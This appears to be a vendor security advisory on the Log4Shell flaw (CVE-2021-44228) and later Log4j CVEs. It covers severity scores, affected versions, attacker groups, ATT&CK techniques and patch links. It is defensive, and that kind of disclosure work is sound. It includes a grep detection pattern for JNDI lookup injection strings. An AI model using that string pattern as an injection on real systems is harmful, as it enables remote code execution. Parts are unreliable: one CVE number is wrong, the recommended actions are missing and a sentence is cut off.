10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
For a detailed advisory, download the pdf file here.
A zero-day remote code execution vulnerability, CVE-2021-44228 was discovered in Apache log4j affecting versions 2.0 to 2.14.1. Apache log4j is a java logging package used by millions of applications. Cloud services such as Steam, Apple iCloud and apps such as Apache Struts, Minecraft, VMware, Twitter, Cisco, Google, Amazon, LinkedIn, NetApp, Elasticsearch and many others are found to be vulnerable from this flaw.
The vulnerability tracked as CVE-2021-44228, could allow a remote unauthenticated attacker to execute code on vulnerable system. The attack is possible due to the failure of the system to protect against attacker-controlled LDAP and other JNDI related endpoints by the Java logging library.
In order to exploit this issue attacker should have an accessible endpoint from any of the protocol (HTTP, TCP etc.) which helps in sending the arbitrary code. Also, a log statement which logs the string at the endpoint from the request.
Users can check if their system is affected from this vulnerability, if they can find any of the hashes from the repository in their software inventory. For checking the exploitation attempt use the following command on your Linux systems: “sudo egrep -i -r '$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log/”.
We recommend users to take the following actions :
The incomplete patch of CVE-2021-44228 resulted in a new issue being tracked as CVE-2021-45056, which affects the versions 2.0 to 2.12.1 , 2.13.0 to 2.15.0 and has been resolved in 2.16.0. An attacker with control over Threat Context map can craft a malicious code using JNDI lookup pattern which can result in a denial-of-service attack.
Apache Log4j2 is affected by another flaw tracked as CVE-2021-45105 and affects the versions 2.0-alpha1 through 2.16.0, resolved in 2.17.0 and 2.12.3. An attacker with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup which result in a StackOverflowError that will terminate the process.
Another vulnerability CVE-2021-4104 in Log4j 1.2 could allow a remote attacker to execute arbitrary code only if the system is configured to use JMSAppender. An attacker with write access to the Log4j configuration can exploit this flaw by causing the untrusted deserialization of untrusted data.
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (CVE-2021-44832) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.
State-sponsored actors such as Apt35 and Hafnium are actively targeting this vulnerability. Currently, the attackers are using the payloads such as crypto miner Kinsing, Mirai botnet, Tsunami, Khonsari, Dridex malware and post-exploitation frameworks such as Cobalt Strike and Mimikatz. Some ransomware such as Conti and TellYouThePass are also targeting the vulnerability.
The Techniques currently used in the attack are:
T1190 - Exploit Public-Facing Application
T1203 - Exploitation for Client Execution
T1059 - Command and Scripting Interpreter
T1496 - Resource Hijacking
T1498 - Network Denial of Service
T1505 - Server Software Component
T1140 - Deobfuscate/Decode Files or Information
T1553 - Subvert Trust Controls
T1059.001 - PowerShell
T1486 - Data Encrypted for Impact
T1090.004 - Domain Fronting
T1114 - Email Collection
T1550.002 - Pass the Hash
T1210 - Exploitation of Remote Services
T1135 - Network Share Discovery
T1083 - File and Directory Discovery
T1482 - Domain Trust Discovery
T1055 - Process Injection
T1068 - Exploitation for Privilege Escalation
T1498 - Network Denial of Service
Patch
<https://logging.apache.org/log4j/2.x/manual/migration.html>
<https://github.com/apache/logging-log4j2/pull/607/files>
<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>
<https://logging.apache.org/log4j/2.x/security.html>
<https://www.lunasec.io/docs/blog/log4j-zero-day/>
<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>
<https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html?m=1>
<https://cert-agid.gov.it/download/log4shell-iocs.txt>
<https://otx.alienvault.com/indicator/cve/CVE-2021-44228>
<https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b>
<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>
<https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes>
<https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890>
<https://github.com/YfryTchsGD/Log4jAttackSurface>
<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>
<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>
<https://security.netapp.com/advisory/ntap-20211210-0007/>
<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>
<https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/>
<https://www.oracle.com/security-alerts/alert-cve-2021-44228.html>
<https://github.com/pravin-pp/log4j2-CVE-2021-45105>
http://zdnet.com/article/belgian-defense-ministry-confirms-cyberattack-through-log4j-exploitation
<https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/>
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C